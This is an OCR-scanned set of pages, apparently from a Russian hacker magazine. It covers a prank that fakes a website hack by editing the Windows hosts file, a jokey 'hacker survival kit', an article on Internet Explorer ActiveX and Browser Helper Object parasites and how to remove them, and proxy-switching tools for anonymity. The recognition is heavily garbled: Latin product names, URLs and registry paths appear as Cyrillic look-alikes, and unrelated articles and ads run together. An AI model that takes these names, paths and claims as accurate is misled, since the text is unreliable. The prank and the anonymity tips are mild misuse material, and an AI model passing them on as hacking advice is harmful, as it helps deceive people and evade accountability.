шо, только при этом слы- 
шен шум. Скорости запи- 
си 2х на ОТЙ-ВАМ нам 
достичь не удалось, толь- 
ко 1х. Кроме программы 
ОТ) Ведіоп Тгее, ничто не 
способно сделать ЗАМ- 
БІЕЙ ОѴО-МІЛЛ 5ВТ03В 
мультизонным. Непонят- 
но, о чем говорит прис- 
тавка МЮ в названии 
устройства, ведь запись 
ОТЙ+В/ВѴѴ невозможна. 
Хотя надо признать, что с 
форматом ОТй-ВАМ ра- 
ботают не все устройства 
в обзоре. 












Организация 


Сайт 


Количество участников 


Поддерживаемые 

форматы 


ЦѴР Гогшп 


ІіНр://иѵѵи.(1ѵ(ІГогит.огд 


223 


ВѴЙ-В, СУМ#, РѴЙ-ВАМ 


ЙѴЙ+В# АІІІапсе 


ЩІр://ииѵѵ.(іѵ(іги.сот 


9 


ЙѴВ*В вѴЙ*»# 


ВесогйаЫе ЦѴР СоипсіІ 


Щір://ѵѵии.г(І»(Іс.огд/епдІі$Іі 


86 


ВѴЙ-В, РѴР-ВѴУ, РУР-ВАМ 


Основные организации, задающие стандарты РѴР 
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МИНЗДРАВ РОССИИ ПРЕДУПРЕЖДАЕТ: 
КУРЕНИЕ ВРЕДИТ ВАШЕМУ ЗДОРОВЬЮ 






СТПФФ 




шпо 



Е сли ты хочешь показать своим друзьям, что реально разбира- 
ешься в хакерстве и можешь захаксорить абсолютно любой 
сайт в Сети, то сейчас мы расскажем тебе об одном способе. 
Способ крайне примитивный, но на чайников производит неизг- 
ладимое впечатление. Работает он под виндой и вот в чем зак- 
лючается. Для примера ты взломаешь при своих друзьях всем 
известный и всеми любимый сайт . Итак, что ты дела- 
ешь. Для начала ты показываешь настоящий со всеми 

ссылочками и картинками. Твои друзья видят загруженный сайт 
с кучей разной инфы. Теперьты говоришь: "Я взломаю этот сайт 
за 60 секунд. Банзай! Аллах Акбар!" За 60 секунд ты, правда, не 
уложишься, но пяти минут тебе точно хватит. В общем, запускай 
какой-нибудь файловый менеджер, заходи в папку ѴѴІІЧ- 
00 ѴѴЗ\зу 5 І:ет 32 \сІгіѵег 5 \е 1 с\ В ней найди файл Иозіз. Открой 
его и добавь в него следующие строки: 



Теперь тебе надо скачать какой-нибудь веб-сервер, на кото- 
рый ты положишь файл с левым дефейсом. В роли сервера 
предлагаю взять апачку (хотя можно и любой другой - это де- 
ло вкуса). Для этого заходи на сайт . Сливай оттуда 

арасііе версии 1 ,3.x. Бери Ьіпагу версию под ѵѵіп32. Ставь его 
на комп в папку, например, с:\арасНе. Запускай его. Про- 
верь работу адреса ІосаІІіозІ. Если отобразилась тестовая 
страница, значит, ты на верном пути. Теперь создавай файл 
іпбех.ИІтІ и пропиши в нем абсолютно любой текст с дефей- 
сом. Потом положи этот файл в каталог арасНе в директорию 
бМосз. Все! Открывай у себя в браузере сайт . О 

чудо! Сайт мегакорпорации взломан! Офигевшие друзья 
должны начать расспрашивать, как ты это сделал. Расскажи, 
что ты читал много литературы, и все это крайне сложно... 

И ыбак без удочки - не рыбак, турист без спичек - завтрак медведя, 
а террорист без гексагена - просто зной мужик. У каждого свой 
набор выживания. Присмотрись хотя бы к себе, и ты поймешь, что 
без некоторых вещей ты обойдешься запросто, а без некоторых пучше 
ничего не начинать. 

Сказки о том, что хакеры - малоразговорчивые, нестриженые, небритые 
создания, одетые в черный ппащ (вспоминается детский мультик), давно 
устарели. Ну где ты видел петом или зимой хоть кого-нибудь в плаще? Теп- 
ловой удар или обморожение причиндалов гарантированы. Хакеры - такие 
же люди, только мыслящие по-своему и со своим набором выживания. 

Мы решили составить собственный набор выживания хакера. Конечно, 
это скромная абстракция, но она недалека от истины. Если ты - хакер, 
для полноты картины тебе останется только добавить свои собственные 
предметы, и набор выживания готов! 




І БЕЙСБОПЬНПЯ 
БИТП 

По народной статистике на 
одного хакера приходится 
куча ламеров и как мини- 
мум один крупный урод 
(обычно больше), который 
встречается в реальной 
жизни в нетрезвом (или об- 
куренном) состоянии на 
темной улице. В таких ситу- 
ациях без биты просто не 
обойтись - сразу чувству- 
ешь себя сухо и комфортно. 



2 БЕЙСБ0ПКП 
ШЕРП 

Лето - оптимальное время 
года для того, чтобы потра- 
тить честно спертые у заж- 
равшихся толстосумов фи- 
нансы. А чтобы не напекло 
светлую голову и не насрали 
голуби, носи этот головной 
убор. Зимой тоже не вопрос 
- проканает кожаный вари- 
ант, сильно натянутый на 
уши. Отличное дополнение к 
бейсбольной бите. 



3 ТЕМНЫЕ 
ОЧКИ 

Ты, наверное, смотрел "Осо- 
бое мнение". Спилберг не 
даст соврать, глаза - отлич- 
ный способ вычислять твое 
текущее местоположение, 
пусть даже и в недалеком 
будущем. И смотреть на чу- 
жой зад безопаснее. А для 
теряющих зрение в продаже 
есть спецмодели с дырочка- 
ми. Сами не пробовали, но 
говорят, что помогает. 



4 НОУТБУК 
8ПМ81ШХ30 

Пристальное внимание ор- 
ганов заставляет хакера 
вносить в повседневную 
жизнь коррективы: почаще 
менять место постоянного 
проживания и быстро уно- 
сить ноги. Ноутбук даст те- 
бе необходимую мобиль- 
ность и возможность быстро 
перемещаться. Жалко толь- 
ко, что до сих пор не суще- 
ствует телепортаторов. 



5 КРУЖКП 
ХПКЕРП 

Смертельная угроза компь- 
ютерных гениев - полное 
обезвоживание. Высыхают 
как гербарий. Если хочешь 
сохранить цвет кожи как у 
младенца, держи под ру- 
кой правильную посуду! А 
что налить - вопрос наст- 
роения. Главное не пере- 
борщить. И передавай фа- 
мильную драгоценность по 
наследству. 
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нобор выживания нпкерп 




В ПУОИОППЕЕР 
8ПИ81ІМС ѴР-55К 

Под музыку приятно не толь- 
ко танцевать и заниматься 
страстным сексом, но и си- 
деть за компом. Для душев- 
ного взлома нужна душевная 
музыка. А благодаря флеш- 
памяти и инету ты всегда бу- 
дешь слушать только новье. 
Миниатюрный (чуть больше 
пальчиковой батарейки), с 
радио и диктофоном, разве 
что не готовит. 



7 компактный 
диск 

Когда-то все влезало на дис- 
кетку 3,5". Теперь запасы 
приходится хранить на мно- 
гогигабайтных винтах. Но для 
резерва на все случаи жизни 
хватит и одного диска (лучше 
СМ)). Посади на него бэкап 
своего компа и можешь жить 
спокойно - даже если нач- 
нется землетрясение, ты 
всегда поднимешь свои дан- 
ные на любом компе. 



8 сотовый 

8ПМ8ШІС5СН-Х100 

У хакера обычно нет стацио- 
нарного телефона, как нет и 
постоянного ІР-адреса. Но 
поддерживать связь с циви- 
лизацией в силу профессио- 
нальной деятельности необ- 
ходимо. В таких случаях ис- 
пользуется мобильник, есте- 
ственно, с 6РВ5 и синхрони- 
зацией с ПК. А будет депрес- 
няк - поиграешь в игры, 
позвонишь подруге. 



ПРЕЗЕРВПТИВЫ 
СПРОМПТПМИ 

Незаменимый предмет в бы- 
ту хакера. В отличие от 
компьютерных, реальные ви- 
русы лечатся не все, хотя 
распознаются без проблем. 
Либо лечатся с потерями 
драгоценного времени и здо- 
ровья. Оно тебе надо? С ре- 
зиновым подходом новая 
подруга быстрее идет на кон- 
такт, а ароматы - хороший 
стимул к оральному сексу. 



М РЮКЗПК . 

С ФИШКОЙ 

Бытует мнение, что главное 
требование к таре - удобная 
и вместительная, а цвет, 
форма и исполнение - это 
бабские предрассудки. Если 
пошел на базар за картош- 
кой, так оно и есть. Но в ос- 
тальном нужен стиль! Выбери 
сочетание комфорта, компа- 
ктности, носкости и ориги- 
нальности. Не забудь про фе- 
нечку сзади. 
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И спик ІЕ - животное стойкое. Редкий журналист-компьютерщик не пинал его жирную тушу своим кованым сапогом. И тормозной он, 
и тяжелый, и бажный до невозможности. Но все без топку - люди продолжают упорно юзать бедного оспа. Юзать, юзать и юзать, 
порой совершенно не замечая того, что морда их верного помощника покрылась какими-то непонятными вкраппениями, что в его 
шкуре попным-попно паразитов, а могучее тело давным-давно пожирает изнутри какой-то опасный недуг... 




МЕЛОДИЧЕСКОЕ ПОСОБИЕ ПО УХ(ЩУ И ДЕЗИНФЕКЦИИ 



А ПРИЧИНИ ВСЕХ БОЛЕЗНЕЙ 

піегпеі Ехріогег велик и дружелю- 
бен. Он представляет собой иде- 
альную мишень для разного рода 
паразитов, которых в последние го- 
ды развелось великое множество. 
Почти все юзеры об этом знают, 
однако ухаживать за своим осли- 
ком, вовремя патчить и проверять 
его самочувствие никто особенно не рвется. 
Большинство считает, что раз Іпіегпеі 
Ехріогег работает, значит с ним все в полном 
порядке. Стоит признать, что этот браузер 
и в самом деле редко дохнет. Только, увы, 
совсем не потому, что его никакая хворь не 
берет. Нет, просто живой ослик паразиту 
нужнее. А ведь некоторые разновидности па- 
разитов творят на машине такие дела, узнав 
о которых, любой юзер сразу же начинает 
жалеть о том, что его ІЕ не сдох еще в дист- 
рибутиве. Не веришь? Тогда читай дальше, 
поскольку у нас сегодня на повестке дня ма- 





л Вгоѵѵзег ЗепііпеІ - ѵѵѵѵѵѵ.ипіізоіиііопз.пеі 
л ЗруѵѵагеВІазіег - ѵѵѵѵѵѵ.іаѵасооІзоЙѵѵаге.сот 
л ВНСЮетоп - тѵѵѵ.гіегіпШѵезоІиііопз.сот 
л АсІ-аѵѵаге - ѵѵѵѵѵѵ.ІаѵазоПиза.сот 
л БруЬоІ - ЗеагсІі & йезігоу - ѵѵѵѵѵѵ.заіег-пейѵогкіпд.огд 
л ВР$ Зруѵѵаге/Асіѵѵаге Ветоѵег - ѵѵѵ\л/ѵ.ЬиІІеІргооІ 50 Й.сот 



ленькие враги большого ІЕ и способы борь- 
бы с ними. 

А СЛИШКОМ ПКТИВНЫЕ иксы 

АсііѵеХ объект - это, грубо говоря, миниа- 
тюрный исполнимый модуль, который может 
быть встроен, например, в веб-страничку. 
Это осх-файлы, и исполняются они, в отли- 
чие от іаѵа-апплетов, совсем не виртуальной 
машиной. К сожалению, АсІіѵеХ объект име- 
ет такие же права, как и обычная программа, 
и может совершать любые действия на тво- 
ей тачке (включая Гогтаі с: /аі). 

Разумеется, компания Майкрософт приду- 
мала защиту от такого исхода, а именно - 
проверку сертификатов, которая осуществля- 
ется посредством Аиіііепіісове. Любой чело- 
век, который хоть раз ставил тасготебіа 
Пазй, видел окно в духе: «Подлинность удос- 
товерена Ребог Рирііп согрогаііоп. Вы доверя- 
ете этой компании? [ОК][САМСЕЦ». Все. 
После того как твои дрожащие пальцы вдави- 
ли ОК, вся ответственность ложится на твои 
плечи. Доверяешь? Все дальнейшие 
действия одобренного АсііѵеХ’а лежат на тво- 
ей совести. В принципе, это в чем-то логич- 
но - вряд ли серьезные компании опустятся 
до воровства шестизнаков или ѴѴМ-кошель- 
ков. Однако, вопрос доверия в бажном мире 
ИТ довольно спорный, тем более что злоб- 
ные хакеры научились этот диалог обходить. 



к. 



Способов обхода, как всегда, два. Первый 
- это социальная инженерия и боязнь юзера, 
что если он не согласится с диалогом, то не 
увидит того, зачем пришел на страницу («Ес- 
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т -ят 


Скажи мне «да», любимый. Потом разденься, 
приготовься и жди... 



ли вы не установите плагин 
ЗирегРогпоРгоідгуѵаГеІ, то не получите досту- 
па к іоопз оГ Тгее рогп»). Второй способ - 
это, конечно, использование багов, позволя- 
ющих устанавливать АсІіѵеХ объекты, не 
спрашивая разрешения у пользователя. Сей- 
час большинство этих багов пропатчены 
(мне не удалось пробить свой ІЕ), но всего 
полгода назад машины пользователей, захо- 
дящих на зло-сайты посредством важного 
ІЕ, охотно расставались с 6-знаками, паро- 
лями и другой важной информацией. Эти 



24 







РОБОЮ С ПОСРЕДНИКОИИ 

Продолжаем тему исполь- 
зования прокси. Выбираем 
правильный софт, упроща- 
ющий переключение между 
прокси-серверами. 



КТО СЛЕДИТ 30 ТЕТЕЙ ОСЕЙ? 

Изучаем софт для перехвата 
переписки по ІСО. Рассмат- 
риваем возможности и ог- 
раничения каждой програм- 
мы, прикидываем методы 
защиты. 



ПИНГВИН В ФОРТОЧКЕ 

Экспериментируем с но- 
вым методом запуска Упих 
прямо из ѴѴіпсІоѵѵз. Изуча- 
ем другие возможности 
«скрещивания» двух опе- 
рационных систем. 



фразы из багтраков как пудовые гири падали 
на головы бедных пользователей: 

...АеІіѵеХ объект 'ЗбеІІАррІісаНоп' может ис- 
пользоваться для изменения известных ярлы- 
ков ('.Іпк' файл) с последующим их выполнени- 
ем. Ярлык может ссылаться на код, располо- 
женный на удаленном сайте, который будет 
выполнен на целевой системе... 

...удаленный пользователь может сконструи- 
ровать НТМІ-, который выполнит произвольный 
’сбт' файл на целевой системе в контексте зо- 
ны безопасности “ ІосаІ Сотриіег ” 
с привилегиями целевого пользователя... 

...используя двойной слеш в ССЮЕ- 
ВА5Е, можно обойти проверку безопасности в 
Іпіегпеі Ехріогег... 

...уязвимости, которые позволяют атакую- 
щему обойти проверки безопасности в ІЕ, заг- 
рузить любой файл на систему пользователя и 
выполнить произвольный код сценария в кон- 
тексте локальной зоны безопасности... 

...удаленный пользователь может сконструи- 
ровать ЖЖ, который может получить доступ к 
локальным файлам... 

Обрати внимание на фразу «произвольный 
код». Произвольный код, выполненный на 
компе пользователя, сидящего под Админист- 
ратором (как любят делать многие) - это путь 
к самым интимным местам системы. И не на- 
до мне говорить, что тебя защитит анитиви- 



рус-монитор или файрвол. Антивирус защи- 
щает лишь от кода, известного разработчикам 
антивируса. «Эвристический анализ» не 
действует на программы, написанные, ска- 
жем, на беірбі. Да что там говорить! Для того 
чтобы замутить трояна, не определяющегося 
антивирусом, нужно 1 ,5 часа с перерывами на 
пиво. Чтобы временно (или навсегда) выбить 
из памяти Оиірозі РігеѵгаІІ также не требуется 
много ума и времени. И что тогда? А тогда 
твоего ослика от странички а-ля «№і$ зііе без* 
ѵіеѵѵеб Ьу поп-раісбеб іе 6.0» спасает только 
вовремя скачанная заплатка от Місгозой. 

А ДОВОЛЬНО СТРОЧНЫЕ 

помощники 

Знаешь ли ты, что такое Вгоѵѵзег Неірег Обіесіз 
(ВНО)? Я расскажу. Это обычные маленькие 
программки, не имеющие пользовательского 
интерфейса, запускающиеся вместе с осликом 
и работающие в его адресном пространстве. 
Задумывались они для облегчения жизни поль- 




ПРИМЕРЫ МОДУЛЕЙ, ППРЛЗИТИРУЮЩЕГО НО ІЕ 



І ЕМопіі - ВНО, придирчиво изучающий запросы, которые 
пользователь шлет к поисковикам, на предмет слов зех, рогпо 
и тому подобных. Может выводить разные дурацкие окошки, ес- 
ли список слов его удовлетворит, и, что опаснее, способен заг- 
ружать и исполнять файлы с сайта своего хозяина. На мысль о 
заражении может навести наличие в ПІІІМ реестра записи 
ІпЕегпеЕ Ехріогег ІЛэгагу. Имя его ОІ_І. - іетопіісііі. 

ІЕТгау - еще один добровольный помощник, на этот раз - рек- 
ламного свойства. Прога эта страдает сильной любовью к поис- 
ковику зеагсб-аісіе.сот, и если юзер пользуется другим, выдает окош- 
ко с предупреждением. 

ІСеШеІ- ВНО-шпион, подсматривающий игі, который набира- 
ет пользователь на предмет ключевых слов, и если они ему не 
нравятся, форвардит куда надо. Кроме того, способен сливать 
с сервера исполнимые файлы и самообновления. Зовут его 
просто и понятно - ВНСШІ-І-. 

МуРадеРіпсІег - эта зло-прога способна лишь менять йоте 
раде и зеагсй зейіпдз ослика жертвы на свой сайт 
(турадеііміег.соі ). Похожими делами занимается и паразит 
ЗеагсйѴѴѴѴѴѴ, который, впрочем, не является ВНО. Он как раз 
представляет собой пример злого АсІіѵеХ элемента ;). 

Нужны еще примеры? Зайди на імм :Іох(1е$к.сот/рага$ - там имеется 
очень толковый список паразитов (с подробными описаниями и 
инструкциями по удалению). 



зователя и обеспечения «еще большего удоб- 
ства» при работе с обозревателем. Именно по- 
этому им доступны следующие вольности: отс- 
леживание стандартных событий (типа «впе- 
ред», «назад», «перейти», «получить ЭРИ теку- 
щей страницы»...), свободный доступ к меню и 
панелям Іпіегпеі Ехріогег, разрешение на отк- 
рытие собственных окон (обычно с разной ин- 
тересной - рекламной, порнографической - ин- 
формацией). 

Есть мнение, что они могут содержать вре- 
доносный код, но лично я, когда первый раз 
прочел про них на ш$(іп.тісго$оЛ.сот, не смог при- 
думать ни одного мирного предназначения :). 
Хотя, стоп, вспомнил - проги-качалки устанав- 
ливают полезные ВНО, которые отслеживают 
клики на файлах и запускают материнскую про- 
гу, которая и осуществляет закачку. Правда, 
один из популярных даунлоадеров (не буду по- 
казывать пальцем на Г одзиллу) в свое время 
был уличен в инсталляции шпионских ВНО, 
при удалении которых он отказывался рабо- 
тать, но это уже мелочи. 

Итак, ВНО - это сІІІ’ка. Причем сІІГка, отве- 
чающая определенным требованиям, напри- 
мер, она должна содержать интерфейс 
ЮЦесШбЗИе и являться СОМ-сервером. Поэ- 
тому, как ты понимаешь, злой ВНО не может 
установиться сам по себе и не подходит под 
определение «вируса». Зато инсталляции мно- 
гих коммерческих прог (и сами проги) с удо- 
вольствием тянут за собой ВНО и... наживляют 
их на густой мех твоего любимого браузера. 

Существование ВНО сильно упрощает кое- 
кому маркетинговые исследования. Оно и по- 
нятно! Зачем доставать людей вопросами о 
том, какие сайты они обычно посещают, какие 
товары заказывают и в каком банке хранят 
свои сбережения, если можно просто засадить 
им на машину правильный ВНО-модуль, кото- 
рый бы шпионил за пользователем и сливал на 
сервер хозяина всю необходимую инфу. Впро- 
чем, маркетинговые исследования интересуют 
лишь крупные компании - цели «физических 
лиц» могут быть и проще. Мне, к примеру, сра- 
зу вспоминается злобный паразит АЗрат 
(Атсі$32.бІІ - имя ВНО, а имя проинсталлиро- 
вавшего его экзешника я, к сожалению, запа- 
мятовал), который является обычным трояном 
и с удовольствием дает своему владельцу дос- 
туп к твоей тачке. Да, еще одна нехорошая де- 
таль - от действий ВНО спасает далеко не 




л Увы, Асіѵѵаге или 
зруѵѵаге-модули мо- 
гут проникнуть на 
твою машину не 
только через Іпіегпеі 
Ехріогег. Ими могут 
«заразить» тебя да- 
же те проги, кото- 
рым ты привык бе- 
зоговорочно дове- 
рять. Не веришь? 
Попроси у доодіе 
найти тебе свежий 
Зруѵѵаге Іпіезіесі 
ЗоНѵѵаге Узі. 




л Советую тебе 
посмотреть на 
и/ѵт.5рушгеіпІо.со 
т/ЬІіоз полный 
список известных 
ВНОз - вставляет 
не по-детски! За- 
одно зайди за ссы- 
лочками на 
ИИр://сехх.огд/а(іѵѵ 
аге.Мш. 
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л Программа АсІ- 
аѵѵаіе - неплохой 
выбор, но она очень 
известна, и некото- 
рые трояны научи- 
лись намеренно 
портить ее файлы. 



л Мвсіп.тісговой.сот 
содержит исчерпы- 
вающую информа- 
цию по ВНО. На 
языке Б. Гейтса, 
разумеется. На 
русском я не видел 
толковых мануа- 
лов, хотя может 
быть, просто плохо 
искал. 



каждый файрвол. Ведь действует такой «по- 
мощник» от имени іехроге.ехе, не входя в про- 
тиворечие с рулесами огненной стены. 

Хорошо еще, что список установленных на 
твоей машине ВНО можно найти в реестре по 
адресу: 

НКІМ\ 50 РТИАКЕ\Місго 5 оВДіЯп(Іои$\Сиггеп!Ѵег 5 Іоп\ЕхрІогег\ 

Вгошег Неірег ОЩесЫ 

Интересно? Мне тоже было интересно, ког- 
да я заглянул сюда в первый раз. Здесь пока- 
заны их СбЗЮ - можешь смело убивать иден- 
тификаторы тех «помощников», которые тебе 
не нравятся (это их дезактивирует). 



этой проги на экране появится небольшое сим- 
патично окошко. 

Все функции Вгоѵѵзег Зепііпеі аккуратно по- 
делены на закладочки. Нас в первую очередь 
интересуют следующие вкладки: ВНО$ - спи- 
сок установленных ВНО, Рошіоабесі АсІіѵеХ - 
установленные АсІіѵеХ, Аиіо тип арріісаііопз - 
список прог, запускающихся при загрузке сис- 
темы. Кстати, не стоит думать, что последняя 
вкладка - лишняя, поскольку автозагрузку нет- 
рудно почистить и с помощью тзсопіід. Туг на- 
до учесть, что Вгоѵѵзег Зепііпеі не только чис- 
тит, но и мониторит состав автозагружаемых 
прог (и не только), сообщая пользователю о 
любых изменениях с помощью окошка, в кото- 



Да, чуть не забыл! На закладке МізсеІІапеоиз 
ты можешь сменить стартовую страницу брау- 
зера и запретить ее изменение в дальнейшем. 
Тоже хорошо. Помнится, юзал я известную 
многим ісц’шникам программу АззаиІІ (генери- 
ровал списки мыло-ШИ :)), так она все время 
мне старалась эту страничку поменять, чем 
жутко меня доставала. 

Короче говоря, не понравиться в Вгоѵѵзег 
Зепііпеі может разве что цена. Если напрягает 
платить 39,95 баксов за этот софт (а кряка нет), 
тебе придется либо редактировать реестр 
вручную, либо юзать другой софт. Неплохую 
команду можно составить из бесплатных прог- 
рамм ВНСЮетоп и ЗруѵѵагеВІазіег. 

Первая утилита будет сканировать реестр в 
поисках лишних «помощников», разрешая юзе- 
ру их включать-выключать (причем решение 
можно принимать на основе выдаваемой 
ВНСЮетоп дополнительной информации по 
каждому ВНО). Вторая - смотреть, чтобы 
с сомнительных сайтов в твой браузер не 
пролезли всякие подозрительные АсІіѵеХ'ы. 




А чтобы предотвратить их появление в даль- 
нейшем, нажми правой кнопкой на Вгоѵѵзег 
Неірег ОЬІесІз и, выбрав пункт «Разрешения», 
запрети всяческую запись в этот раздел. 

Эго не идеальный выход, потому что бывают 
и полезные помощники (странное словосочета- 
ние), запись которых хотелось бы разрешать. 
Если ты активно пользуешься ІЕ и не хочешь от- 
казываться от разных удобных примочек, твоим 
оружием будут специальные проги для борьбы 
со шпионскими и рекламными модулями. 

Л СЕСТРП, СКППЫІЕПЬ! 

Вот так вот, потихоньку, мы и перешли к софту. 
Если неохота вручную выискивать паразитов по 
всему реестру, советую поставить себе на ма- 
шину программу Вгоѵѵзег Зепііпеі. М.ФАзб не 
зря рекомендовал ее в своих ШароѴѴАРЕ как 
отличное средство для серьезной дезинфекции 
Іпіегпеі Ехріогег. После установки и запуска 




ром обнаруженное изменение можно принять 
или отклонить. Правда, для этого программа 
сама должна запускаться вместе с ѴѴМоѵѵз, 
что, впрочем, понятно. Но это так, мелочи. 

А вот функции наблюдения за зарегистриро- 
ванными АеІіѵеХ-объектами и ВНО, предупреж- 
дения об изменениях в их составе и возмож- 
ность оперативного их удаления - это в 
Вгоѵѵзег Зепііпеі и в самом деле радует. Вклад- 
ки ТооІЬатз, Вийопз, Сопіехі Мепи и Тооіз Мепи 
также могут пригодиться - с целью удаления 
из интерфейса всяких левых кнопочек, панелей 
и пунктов меню. Скажем, на фига тебе лишняя 
кнопка запуска РІазбСеІ, когда он по-любому 
сам запустится при клике на подходящую 
ссылку? Или вот, к примеру, что это за ІІзе 
ѵѵебсоѵѵ оп ІІііз Раде у меня в контекстном ме- 
ню? Я уже и не помню, что это за «ѵѵебсоѵѵ» та- 
кое, так давно это дело стер... М-да... умение 
Вгоѵѵзег Зепііпеі возвращать внешность ослика 
в исходное состояние и избавлять его от ду- 
рацких извращений чужих прог, думаю, должно 
понравиться многим. 

Само собой, работа большинства функций 
Вгоѵѵзег Зепііпеі сводится к простому редакти- 
рованию реестра, но, как известно, удобство 
стоит денег. 



Само собой, поправить здоровье ослика 
ІЕ только описанным софтом удается далеко 
не всегда. Для полноценного лечения до- 
вольно часто приходится прибегать к допол- 
нительным прогам, специализирующимся 
на отлове и истреблении шпионских моду- 
лей. Если тебе нужны конкретные названия, 
то вот тебе три самые известные утилиты 
данного вида: АсІ-аѵѵаге РІиз, Зрубоі - Зеагсб 
& Оезігоу и ВРЗ Зруѵѵаге/Абѵѵаге Ветоѵег. 
Однако это тяжелая артиллерия. Главное - 
знать об уязвимых местах своего ослика 
и уметь вовремя поставить правильный 
диагноз. А как раз в этом описанный выше 
софт может тебе очень помочь. 2X1 
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Ослик и косметическая хирургия... 










ІМОК1А 



Новый телефон N о кі а 2300. 
Он готов. 

Тусоваться вместе с тобой. 
Висеть в чате, болтать. 
Играть, веселиться. 




Встроенная громкая связь 
Быстрый доступ к функции 5М5 
Продолжительное время работы 
Полифонические мелодии звонка 
Сменные панели и клавиатура 
Виброзвонок 
Игры 
БМ-радио 



ІМОКІА 

СотЕСТШС Реорье 



ѵѵѵѵѵѵ. покіа.ги 




0 прошлой ноиере мы освоили процесс проверки прокси-листов. Что теперь? Тупо копировать оттуда адреса рабочих прокси и 

вставлять их в настройки браузера? Конечно же, нет! Ведь это так медленно и неудобно, а лично я уже привык к тому, что работа за 
компьютером доставляет мне удовольствие. Поэтому давай оставим все ручные методы чайникам, а сами присмотримся к более 
эффективным способам переключения любимой бродипки с одного прокси-сервера на другой. И не только бродипки, кстати. Есть и другие 
проги, которые можно заставить сохранять анонимность в Сети, даже если функционально это в них не предусмотрено. 




метопы провипьного использования ПРОКСИ 



А ВЖИВЛЯЕМ 

ПЕРЕКПЮЧПТЕПЬ В ОСЛО 

екоторые, как роботы, каждый 
день выполняют одно и то же 
действие. И порой даже не за- 
думываются, что многое мож- 
но с легкостью автоматизиро- 
вать. Так, например, мне не 
раз доводилось наблюдать, 
как некоторые товарищи по 
нескольку раз в день вручную меняют наст- 
ройки ослика ІЕ, чтобы подружить его с оче- 
редным прокси-сервером. Хотя... что там го- 
ворить - я и сам когда-то этим грешил. Пом- 
ню, мне частенько приходилось переключать 
прокси браузера, чтобы зайти на один фо- 
рум - и все потому, что его админы забани- 
ли всю мою сеть! Да и лишнее 5М5-сообще- 
ние с сайта сотового оператора порой было 




л Помимо описанных в статье утилит, существуют такие софтины, как 
НІРгоху (ѵѵѵѵѵѵ. Иіргоху .сот) , Мультипрокси (ѵмѵѵ.тиі(іргоху.огд), Ргохута 
(оП.тподоѵѵт.сот), Ргоху зѵѵНсіі (ѵтѵѵ.зеагсііиііііііее.сот/рвѵѵ). Все они 
так или иначе связаны с переключением прокси. Экспериментируй - быть 
может, подберешь что-нибудь исключительно для себя. 




нелегко отправить: везде стоят на ІР-адрес 
количественные квоты. Словом, ты уже по- 
нял, что программы для быстрой смены 
прокси в браузере очень и очень актуальны. 
Перебрав кучу софта, я остановился на ути- 
лите ѴРВапб. Эта маленькая и простая тулза 
представляет собой насадку-расширение 
для Іпіегпеі Ехріогег'а. После ее установки в 
панели инструментов ослика появятся 4 не- 
больших симпатичных кнопочки. 




Теперь для переключения прокси доста- 
точно кликнуть на пимпу Ргоху Зегѵег и выб- 
рать нужный сервер из списка. Как тебе? 





По-моему, идеальный вариант, если тебе 
прокси особенно не нужны, но иногда их 
приходится юзать. Например, чтобы попасть 
на сайт, куда тебя с твоим ІР-адресом, увы, 
не пускают. Да и дополнительные фишечки 
ѴОВапсГа лишними не будут. Куда удобнее 
включать/выключать отображение картинок 
или управлять приемом Соокіез с помощью 
соответствующей кнопки на панели инстру- 
ментов, чем каждый раз копаться глубоко в 
опциях. 

А НПСТРПИВПЕН ПВТОМПТИКУ 

Не стоит забывать, что прокси-серверы юза- 
ют не только ради анонимности. Это еще и 
отличный способ увеличить скорость работы 
в Сети. Естественно, в этом случае наиболее 
рационально использовать ближайший прок- 
си, т.е. прокси-сервер того провайдера, к 
которому ты в данный момент подключен! 

Но что делать, если ты время от времени 
меняешь провайдеров (инет у тебя по кар- 
точкам)? Каждый раз изменять настройки 
прокси ѴЭВапсГом? Не спорю - это вариант! 
Но есть способ лучше - познакомься побли- 
же с программой Аиіогоиіе 5МТР. 

Вообще-то, эта утилита предназначена 
для автоматического перенаправления исхо- 
дящей почты на ближайший ЗМТР-сервер. 



Однако в программе отсутствует жесткая 
привязка к почтовому протоколу. Поэтому ее 
можно настроить на любой другой, исполь- 
зующий одно ТСР-соединение, в том числе и 
НИР. Я проверял - прога отлично работает в 
качестве автоматического переключателя 
прокси! Нужно лишь в настройках Аиіогоиіе 
5МТР вместо 5МТР-серверов вписать адреса 
провайдерских прокси, не забывая указывать 
через двоеточие их порт. Все остальные оп- 
ции - абсолютно некритичны! 




небольшой базой анонимных прокси-серве- 
ров. А то, что некоторые из них даже работа- 
ют, наверняка порадует тех юзеров, которые 
наукой поиска свежих прокси-листов в со- 
вершенстве еще не овладели :). 

Прокси-серверы в А4Ргоху можно добав- 
лять либо поштучно, либо массово (импор- 
тируя их из текстового файла). Причем все 
прокси можно тут же проверить на аноним- 
ность. Так сказать, по ходу пьесы. Впрочем, 
не буду на этом подробно останавливаться - 
у программы есть масса других вкусностей. 

Используемые прокси выбираются как 
вручную, так и ав- 
томатически. С 
ручной установкой 
все предельно по- 
нятно (достаточно 
буквально несколь- 
ких кликов 
мышью), а автома- 
тический выбор 
прокси вообще 
выглядит шикарно. 



Подружить любой софт (не только ІЕ!) с 
этой тулзой нетрудно - просто установи в ка- 
честве прокси-сервера ІР-адрес своей ло- 
кальной машины и порт, на котором висит 
программа. В общем случае сойдет комби- 
нация 127.0.0.1:25. Готово! Аплодисменты 
разработчикам: фантастически удобно, а 
аналогов просто нет. Забил адреса прокси 
провайдеров (для скорости), добавил ано- 
нимных прокси (для безопасности), и мо- 
жешь радоваться жизни. Подключение на 
ближайший прокси прога выполнит сама, а 
если тебе надо будет замаскироваться - 
кликни по иконке в системном трее и выбе- 
ри необходимый прокси вручную. Круче, по- 
жалуй, и не бывает :). 

А когда важно безоппсность 

Обе предыдущие утилиты невероятно полез- 
ны... для обычного юзера, который просто 
хочет быстро и без проблем гулять по Сети. 
Но давай немного отвлечемся и представим, 
что для тебя крайне желательно оставаться 
абсолютно анонимным. Тогда тебе следует 
заюзать другую поистине замечательную 
утилиту - А4Ргоху! Как и Аиіогоиіе ЗМТР, эта 
прога служит связующим звеном между тво- 
им софтом и прокси-серверами. Только 
А4Ргоху имеет четкую специализацию - бе- 
зопасность! Программа изначально идет с 
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потребовать, чтобы каждому запросу выде- 
лялся свой собственный "посредник". При- 
кинь, какая тогда неразбериха возникнет в 
логах удаленного веб-сервера. 

Напоследок отмечу наличие таких инте- 
ресных фишек, как блокировка всех переда- 
ваемых кукисов, подделывание переменных 
окружения и возможность раздачи аноним- 
ного инета по локальной сети. Словом, 
А4Ргоху - это даже не программа, это мечта 
параноика. И лично я от нее в восторге :). 

